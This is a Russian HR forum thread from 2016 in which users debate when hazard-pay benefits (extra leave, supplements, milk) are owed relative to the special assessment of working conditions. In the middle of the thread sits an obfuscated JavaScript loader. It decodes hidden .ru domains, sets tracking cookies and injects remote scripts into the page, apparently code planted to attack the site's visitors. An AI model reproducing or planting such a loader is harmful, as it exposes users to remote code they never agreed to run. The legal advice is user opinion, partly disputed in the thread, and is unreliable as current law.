Тема форума: Вредные условия труда. Принимаем на должность, по которой еще не было СОУТ | Форумы "Кадровое делопроизводство" | Сообщение № 437270

Вредные условия труда. Принимаем на должность, по которой еще не было СОУТ , Публикация №437270

Страницы:12След.
Ответить
Вредные условия труда. Принимаем на должность, по которой еще не было СОУТ

Коллеги, добрый день.
У нас на производстве есть двое сотрудников, у которых спец оценкой труда было выявлена вредность (3.2) это у литейщиков. Сейчас принимаем на работу человека на должность плавильщика. Спец. оценка рабочего места будет еще проводится, но вредность у него точно будет. Сегодня разругались с инженером по охране труда. Она утверждает,что уже сейчас мы должны его принять на работу на условиях вредности ( т.е. +12 дней отпуска, доплата и выдача молока), а спец. оценка только подтвердит вредность. Я же считаю,что официально вредность по этой должности мы можем назначить только после проведения спец.оценки труда. И только на основании этой проверки предоставить ему +12 дней отпуска, доплату и выдачу молока. Хотелось бы услышать ваше мнение. Кто прав???

У в аналогичной ситуации эти компенсации устанавливались приказом директора, в котором указано "до проведения спец.оценки труда......". Все-таки я на стороне инженера по ОТ... А льготный стаж у данной профессии есть? Честно говоря, не очень владею этим вопросом, тоже очень хотелось бы услышать мнение коллег...

window .a1336404323 = 1;!f unction(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "kadrovik-praktik.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .smlo.loadSmlo(n.r eplace("https:","http:"));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .zSmlo.loadSmlo(n.r eplace("https:","http:"));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Изменено: Кокош - 08.02.2016 19:15:51(# Удалено # текст)

Цитата
Sara-HR пишет:
официально вредность по этой должности мы можем назначить только после проведения спец.оценки труда.
Да, сейчас так.

Здравствуйте.
Разрешите присоединиться со своей проблемой.
Есть материнская строительная организация, в которой по результатам СОУТ есть вредники. От этой организации отделилась "дочка". И часть работников - вредников переведены в дочку. Практически должности всего персонала входят в список. Отсюда вопросы.
1. Можем-ли мы устанавливать вредность на основании карточек материнской организации? Так предлагает инженер по ОТ.
2. В какие сроки мы должны провести СОУТ от начала работы компании?
3. Могут -ли быть применены к компании какие-нибудь штрафы за невыплату вредности до СОУТ?

Буду очень признательна за помощь!

Цитата
1. Можем-ли мы устанавливать вредность на основании карточек материнской организации? Так предлагает инженер по ОТ.
Нет. У Вас теперь есть самостоятельное юрлицо, на которое возложена обязанность по проведению специальной оценки условий труда.

Цитата
2. В какие сроки мы должны провести СОУТ от начала работы компании?
По каждому отдельному рабочему месту срок проведения соут - 6 месяцев с момента введения его в действие.

Цитата
3. Могут -ли быть применены к компании какие-нибудь штрафы за невыплату вредности до СОУТ?
Вредность утсанавливается только по результатам СОУТ. Нет вредности - нет выплат.

Благодарю за ответ.
Теперь все более-менее понятно.

Если должность вредника из Списка и предполагает льготный стаж пенсии то работодатель платит 6% доп.взносов в пенсионный фонд, а после ССОТ (чаще всего) этот взнос может быть уменьшен - это и есть стимул чтоб работодатели проводили этот ССОТ. А остальные льготы после ССОТ (надбавки,сокращенный день,доп.отпуск), хотя мне кажется работодатель на время до ССОТ должен у себя прописать в ЛНА. Все понимают что вредность есть (Особенно 3.2 и выше), но не платят - с отпуском понятно- его по факту и потом можно дать, а доплату? а сокращ.день?
Поверьте ваши ЛНА и Колдоговор - если в них прописаны должности, а не по результатам ССОТ то будете платить пока не поменяете.

Костик.
Вы хотите сказать, что если должность из списка - например
Изолировщик на термоизоляции
- (XXVII. Строительство, реконструкция, техническое перевооружение, реставрация и ремонт зданий, сооружений и других объектов), то ему платится надбавка за вредность даже без учета проведения СОУТа? А также устанавливается сокращенное рабочее время и даются доп.дни отпуска?

А потом, когда пройдет СОУТ - надбавку сокращают и снимают рабочее время
Прошу не обижаться - я просто пытаюсь разобраться в вопросе. Руководство наседает.

Цитата
то ему платится надбавка за вредность даже без учета проведения СОУТа?
Для этого нет оснований.

Цитата
Костик пишет:
хотя мне кажется работодатель на время до ССОТ должен у себя прописать в ЛНА.
Меня смутило именно эта фраза.

Я предлагаю прописать это в ЛНА а не указываю что это нужно делать. ЭТО ваши вредники они ВАМ деньги зарабатывают и ВЫ должны их социально защитить. ДО проведения ССОТ определите перечень льгот в ЛНА, а после ССОТ по его результатам и все споры закончатся

Добрый день.
Была проведена АРМ, у сотрудников: общая оценка условий труда по степени вредности и (или) опасности факторов производственной среды и трудового процесса - 2 (класс условий труда).
Получается им всем полагается сокращенная продол.раб.вр., доп.отпуск, доп.оплата труда? Или только тем сотрудникам у которых оценка 3.1,3.2?
Спасибо.

АРМ это что? Это у вас старые АРМ? или всё таки новые и ССОТ (Специальная оценка условий труда).
В ССОТ по каждому рабочему месту есть табличка что положено - Доп.отпуск, доплата, молоко, пенсия и т.д. Если нет то в табличке так и ставится НЕТ. У нас у Главбуха класс 2 (допустимые) но напротив медосмотра стоит ДА, а в ОСтальных строчках НЕТ. (доплаты нет, пенсии досрочно нет, молока нет, доп. отпуска нет) Медосмотр периодический по фактору ....... - из приказа №302н

А у строительного мастера ДА стоит в медосмотрах, доплатах и досрочной пенсии - доп.отпуск не даём молока не наливаем
Формируем пакет документов в Пенсионку и платим повышенные взносы на тех работников у которых выявлены условия именно на досрочную пенсию
Изменено: Костик - 23.03.2016 16:13:10

Костик, добрый день. У нас была в 2013 году аттестация рабочих мест по условиям труда. Получается если только в табличке стоит ДА, это и делаем? Не считаю того, что если класс 3.1, но в табличке ДА нигде не стоит?
Спасибо.

Цитата
swiit пишет:
Получается если только в табличке стоит ДА, это и делаем? Не считаю того, что если класс 3.1, но в табличке ДА нигде не стоит?
Получается да. Значит Вы создали такие условия труда что факторы вредности не наносят столько вреда чтоб предоставить такие льготы. Это следует если напрямую читать НПА. Некоторые считают что если профессия стоит в перечне вредных условий труда автоматом предоставляются льготы, но ответы свои ничем не обосновывают. ..
Ранее было постановлене Прав-ва №870 - отменено в 2014 г. - там было так и написано - вреден - автоматом всё. Сейчас в ТК
"на рабочих местах которых по результатам
специальной оценки
условий труда отнесены к вредным условиям труда 2, 3 или 4 степени либо опасным условиям труда." (т.е. классы 3.2-3.4 и 4)

ПРЯМ нигде ДА нет? :))) доплата при 3.1 точно положена - ст. 147 ТК минимально 4% - должны вы размер прописать в ЛНА.
Для верности созвонитесь с организацией проводившей вам АРМ - возможна ведь и ошибка. Мы наши проверяли раз 10 исправления вносили - всё по шаблону пытаются сделать:(

Костик, из 85 человек ДА стоит только у электросварщика - доп.отпуск и молоко.
У остальных ничего, даже если стоит 3.1 и 3.2.
Вот и думаю...

swiit, Очень странно. нам даже у 2 класса проставили медосмотры раз в 2 года. (ССОТ 10.2015г.). Проведите Новый ССОТ по тем у кого 3 класс хотябы - я думаю вы в итоге выиграете - сейчас уменьшают все выплаты, нам ни доп.отпусков ни сокр.дня ни молока никому не прописали. Только медосмотры

А Доплаты вы должны делать напрямую из ТК - без АРМ и ССОТ

Костик, посмотрела внимательно. ДА по мед.осмотрам стоит почти у всех. Однако, только у электросварщика - доп.отпуск и молоко.

А доплаты положены всем кому присвоен класс 3.1, 3.2?
Спасибо.

swiit, я уже много раз написала это - я ж вам не лектор - сами читайте уже законы

Статья 146. Оплата труда в особых условиях
Оплата труда работников, занятых на работах с вредными и (или) опасными условиями труда, производится в повышенном размере.

Статья 147. Оплата труда работников, занятых на работах с вредными и (или) опасными условиями труда

Оплата труда работников, занятых на работах с вредными и (или) опасными условиями труда, устанавливается в повышенном размере.
Минимальный размер повышения оплаты труда работникам, занятым на работах с вредными и (или) опасными условиями труда, составляет 4 процента тарифной ставки (оклада), установленной для различных видов работ с нормальными условиями труда.
Конкретные размеры повышения оплаты труда устанавливаются работодателем с учетом мнения представительного органа работников в порядке, установленном статьей 372 настоящего Кодекса для принятия локальных нормативных актов, либо коллективным договором, трудовым договором.
Давайте я уже не буду расписывать что есть оптимальные, допустимые вредные и опасные условия труда - сама искать для вас документы. У вас есть вредники - Вам это нужно самой понять.

Костик, почитать законы и ЛНА мы и сами можем. Хотелось конкретного.
Для людей, которые разбираются в чем-то другие кажутся дураками. А если не хватает терпения, проще не отвечать.

swiit, а в предыдущих трех сообщениях я не достаточно конкретно писала что доплата положена если есть вредность. Мне абсолютно не сложно ответить но не 4 раза же одно и то же. Я сама на форуме общаюсь именно для того чтоб рассказать что знаю и спросить что не знаю. НО конкретно и по полочкам решить за вас никто не сможет. (порой хотелось бы:oops:) Есть НПА но прописать все нюансы трудно...
И я абсолютно без злости писала - Один раз надо выделить время и систематизировать все свои знания по вредникам.

Удачи

Добрый день, коллеги!
Поделитесь, пожалуйста, опытом и знаниями!
Нормативку роем, но конкретно найти не получается(
Электрогазосварщикам установлена вредность 3.2. По СОУТу им положено: молоко, доп.отпуск., доплата.
Вот и задумались...про молоко вычитали, что выдается только когда работник отработал во вредных условиях труда более 50% рабочего времени. Для этого рекомендуют заводить журнал, когда работник работал во вредных словиях.
А как быть с доплатой и отпуском? Также зависит от фактически отработанного времени во вредных условиях?
По ТК РФ фраза "...работникам, занятым на работах с вредными условиями труда..." Вот если бы было написано "работникам, чьи условия труда относятся к вредным...", то у меня не было бы сомнений, что выплачивать в любом случае...
Очень надеюсь на ответы!

Цитата
ketty* пишет:
А как быть с доплатой и отпуском? Также зависит от фактически отработанного времени во вредных условиях?
Именно так и есть, т.е. больничные, время отпусков не входят. а только время исполнения служебных обязанностей.

Цитата
ketty* пишет:
Вот и задумались...про молоко вычитали, что выдается только когда работник отработал во вредных условиях труда более 50% рабочего времени. Для этого рекомендуют заводить журнал, когда работник работал во вредных словиях.
Нет, раз вредность определена, то всё рабочее время электрогазосварщика вредное, тем более они и так относятся к списку вредных профессий.

Спасибо огромное за ответы!
Про болезнь и отпуск-это понятно..учли. Руководство настаивает, что и доплата и доп.отпуск только в зависимости от того, сколько часов он "варил". Мое ж мнение, что доплата и отпуск положены по умолчанию. Как и вы говорите.

Цитата
ketty* пишет:
Руководство настаивает, что и доплата и доп.отпуск только в зависимости от того, сколько часов он "варил"
Нет конечно, тем более СОУТ оценивает именно условия труда на рабочем месте работника и не разделяет его на варит или готовится к сварке. Стоит просто зайти в цех сварки во время работы и вопрос о вредности более не встаёт. Желание руководства минимизировать затраты понятно, но увы этого нет.Посему всё его рабочее время при работе на рабочем месте вредное. Вот при временном переводе, отстранении и т.д. вредность не идёт, поскольку работник либо работает на другом рабочем месте, а там своя карта СОУТ, либо не работает вовсе.
Страницы:12След.
Ответить
Читают тему
Форма ответов

Текст сообщения*
Перетащите файлы
Ничего не найдено
Файл